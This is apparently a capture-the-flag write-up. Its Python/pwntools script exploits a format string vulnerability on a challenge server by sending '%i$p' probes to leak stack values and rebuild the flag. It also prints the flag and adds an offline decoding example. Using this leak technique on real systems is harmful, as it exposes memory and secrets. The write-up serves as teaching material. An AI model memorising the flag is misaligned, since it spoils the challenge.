The Dragon's Secret Scroll

Challenge Description:

We are not given any file, so we can guess that this is a format string vulnerability.

Let's build a Python script that fuzzes the positional argument index of a `%p` format specifier and tries to extract the flag from the leaked values.

Exploit:

from pwn import *

flag = ''

# Let's fuzz the positional argument index i
for i in range(100):
    io = None
    try:
        # Connect to server
        io = remote('173.255.201.51', 51337)
        # Format the counter
        # e.g. %i$p will attempt to print the [i]th pointer (or string/hex/char/int)
        io.sendline('%{}$p'.format(i).encode())
        # Receive the response (the leaked value is printed after 'give you.. ')
        io.recvuntil(b'give you.. ')
        result = io.recv()
        if b'nil' not in result:
            print(str(i) + ': ' + str(result))
            try:
                # Decode, reverse endianness and print
                decoded = unhex(result.strip().decode()[2:])
                reversed_hex = decoded[::-1]
                print(str(reversed_hex))
                # Build up flag
                flag += reversed_hex.decode()
            except Exception:
                # Not valid hex or not printable text; skip this chunk
                pass
    except EOFError:
        pass
    finally:
        # Close this connection before opening the next one
        if io is not None:
            io.close()

# Print the result
info(flag)

Let's run the fuzzer.

Flag:

KCTF{DRAGONsCrOll}
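The decoding step the fuzzer relies on, shown offline as an added example (this is not part of the original writeup and never touches the server): each `%i$p` leak is a 64-bit word printed without leading zeros, so it is re-padded, byte-reversed to undo little-endian order, and kept only if it looks like text. The responses below are constructed from the known flag and a made-up stack pointer; the 8-byte word size is an assumption about the target.

```python
# Constructed sample responses, keyed by the %i$p index that would produce them.
# They are NOT captured from the challenge server; they encode the known flag
# split into 8-byte little-endian words, plus one non-flag pointer (made up).
SAMPLE_LEAKS = {
    6: "(nil)",                # NULL on the stack, printed as "(nil)" by printf
    7: "0x4152447b4654434b",   # "KCTF{DRA"
    8: "0x6c4f7243734e4f47",   # "GONsCrOl"
    9: "0x7d6c",               # "l}" + NUL padding; %p drops the leading zeros
    10: "0x7ffd1a2b3c4d",      # a stack address, not flag data (constructed)
}

WORD_SIZE = 8  # bytes per %p leak on a 64-bit target (assumption)


def decode_word(token: str) -> bytes:
    """Turn one %p token back into the bytes it was read from (little-endian)."""
    token = token.strip()
    if token == "(nil)":
        return b""
    if token.startswith("0x"):
        token = token[2:]
    # %p omits leading zeros, so re-pad to a full word; this also repairs
    # odd-length hex strings, which the writeup's fuzzer would silently drop.
    padded = token.rjust(WORD_SIZE * 2, "0")
    return bytes.fromhex(padded)[::-1]


def is_text(chunk: bytes) -> bool:
    """True if the word (ignoring NUL padding) is entirely printable ASCII."""
    stripped = chunk.rstrip(b"\x00")
    return bool(stripped) and all(0x20 <= b < 0x7F for b in stripped)


def assemble_flag(leaks: dict) -> str:
    """Concatenate the text-looking words in stack order, as the fuzzer does."""
    out = b""
    for idx in sorted(leaks):
        chunk = decode_word(leaks[idx])
        if is_text(chunk):
            out += chunk.rstrip(b"\x00")
    return out.decode("ascii")


if __name__ == "__main__":
    print(assemble_flag(SAMPLE_LEAKS))
```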
